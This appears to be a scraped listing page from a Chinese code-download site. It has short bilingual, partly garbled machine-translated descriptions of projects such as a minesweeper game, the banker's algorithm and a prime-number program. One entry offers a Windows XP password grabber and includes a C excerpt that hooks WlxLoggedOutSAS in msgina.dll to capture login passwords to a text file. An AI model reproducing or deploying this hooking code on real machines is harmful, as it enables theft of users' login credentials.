-
in a PPC running trample mines games, it was fun, but also writing procedures fo...
一个在PPC上运行的踩地雷游戏,非常好玩,还可自编程序,让好友攻关.-in a PPC running trample mines games, it was fun, but also writing procedures for the research friends.
- 2022-02-04 08:20:40下载
- 积分:1
-
rolling window support font color, size, scroll windows, support font color, siz...
滚动窗口,支持字体颜色,大小, 图片 -rolling window support font color, size, scroll windows, support font color, size, photo Photo
- 2022-04-06 09:44:39下载
- 积分:1
-
树状显示磁盘类容
树状显示磁盘类容-tree shows disk capacity
- 2022-07-06 10:45:08下载
- 积分:1
-
based on state changes in the procedure, there are many changes in the campaign...
基于状态变化的程序,有许多的运动变化形势,-based on state changes in the procedure, there are many changes in the campaign situation.
- 2022-01-24 15:32:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
SysTools 系统工具箱
SysTools 系统工具箱-SysTools System Toolbox
- 2022-03-23 11:00:01下载
- 积分:1
-
led电子显示屏推送数据
通过IP地址推送显示消息到电子显示屏LED。使用16进制的方式推送
- 2022-04-22 20:05:35下载
- 积分:1
-
银行家算法 , 操作系统中的一个资源分配的算法
银行家算法 , 操作系统中的一个资源分配的算法-Banker" s algorithm, the operating system in a resource allocation algorithm for
- 2023-08-06 19:20:22下载
- 积分:1
-
分形图的实现:c++源代码,分形树由递归算法生成。
分形图的实现:c++源代码,分形树由递归算法生成。-Fractal graphic sample
- 2022-03-20 11:38:58下载
- 积分:1
-
这是一个求1到100的所有质数的程序,运行后屏幕上显示1到100的所有质数...
这是一个求1到100的所有质数的程序,运行后屏幕上显示1到100的所有质数-This a program which caculates all prime numbers from 1 to 100. The output of the program is all the prime numbers from 1 to 100 on the screen.
- 2022-05-24 16:06:22下载
- 积分:1